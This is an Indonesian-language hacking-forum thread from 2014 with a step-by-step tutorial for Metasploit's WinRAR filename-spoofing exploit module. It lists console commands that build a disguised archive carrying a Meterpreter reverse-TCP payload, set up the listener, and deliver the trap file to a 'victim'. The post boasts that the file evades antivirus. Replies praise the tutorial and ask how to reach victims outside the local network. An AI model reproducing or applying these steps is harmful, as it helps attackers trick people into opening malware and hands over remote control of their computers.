WinRAR Filename Spoofing with Metasploit

**Clound_Carbelius** · 06-04-2014, 05:47 PM

Belom lama ini dunia lagi ramai dengan "Winrar File Spoofing" Blush

sampai-sampai metasploit membual module exploit nya..

saya pun tertarik untuk mencoba nya ^ ^ :d
Menurut saya ini cukup bagus ya,buat memanipulasi trap / jebakan ) ke victim
karna lolos dari Anti Virus ( entahlah, gak banyak saya test ke AV lain )

Requiment :
Metasploit v4.9.2 atau lebih
more info about metasploit v4.9.2 at https://community.rapid7.com/docs/DOC-2736

ok..mari kita coba > Big Grin

<

Open your metasploit console

[Image: win1.png]

[hide]
msf > use exploit/windows/fileformat/winrar_name_spoofing
msf > set filename [ Name_File ]
msf > set spoof [ File_Trap ]

msf > set payload windows/meterpreter/reverse_tcp
msf > set lhost [ your IP ]
msf > set lport

Kita buat file nya dengan perintah "exploit"
file di directory /root/.msf4/local/

[Image: win2.png]

ok,next kita hanya tinggal kasih ke victim Smile

Jalankan exploit multi handler
untuk melisten/ menerima koneksi dari target via exploit yg tadi dibuat

[Image: 3.png]

and..ketik si victim membuka file tersebut,
**damm ,you got meterpreter session Angry

[/hide]

Postingan ini boleh di share/di perbanyak,dengan menyertai link sumber dibawah :
http://carbelius.blogspot.com/2014/06/wi...ploit.html

thx IBTeam :-bd

**wine trochanter** · 06-04-2014, 07:03 PM

sory ane copas ke mari
biar tau sumber primer nya cz dah lama Big Grin

Belom lama ini dunia lagi ramai dengan "Winrar File Spoofing"
sampai-sampai metasploit membual module exploit nya..

http://www.exploit-db.com/exploits/32752/

Requiment :
Metasploit v4.9.2 atau lebih
more info about metasploit v4.9.2 at https://community.rapid7.com/docs/DOC-2736

**Clound_Carbelius** · 06-05-2014, 05:55 PM

(06-05-2014, 11:02 AM)Hendra Yuana Wrote: Tutornya terlalu om, jadi kagak ngerti ane :v

Ndak..ngerti nya dimna om ?? Undecided

**dimascyber4rt** · 06-05-2014, 06:29 PM

thanks bro udah sharing ilmunya...
mantap dah bro buat iseng iseng wkwkwk

**smokerchuy** · 06-27-2014, 03:38 PM

mmmh.. . bang kalo kita ngasih ini ke korban yang ada di luar jaringan kita gmna ya bang?? apa dengan cara diatas juga bisa bisa langsung dpt sesion dari korban yang ada diluar jaringan kita??

**EKO_X** · 06-27-2014, 06:18 PM

screenshot target nya sekalian dong Big Grin

**arafahcom** · 06-28-2014, 03:36 AM

winrar juga sekarang udah dispoof , tidak lama lagi mungkin hatiaku juga bisa di spoof -_-
nice tutor om Big Grin

, unik

**alkaaf** · 06-28-2014, 09:18 AM

file yang di spoof di dalam arsipnya tuh bisa file lain ngga bro? (selain txt)

**Clound_Carbelius** · 06-29-2014, 04:15 PM

(06-28-2014, 09:18 AM)alkaaf Wrote: file yang di spoof di dalam arsipnya tuh bisa file lain ngga bro? (selain txt)

msf > set spoof [ File_Trap ]

gw juga blom coba sih.. tapi klo ganti .extensi nya doang bisa
tapi size nya gk brubah :3

klo masukin file lain ke .rar itu,gw blom coba Angry

**Krishna_Nelson** · 06-30-2014, 12:35 PM

Izin nyoba ya kawan..
Tapi ntar :d

Anjir..
Ketik"m.a.s.t.a.h" (tanpa tanda petik + tanpa titik) jadi tulisan "kawan" --"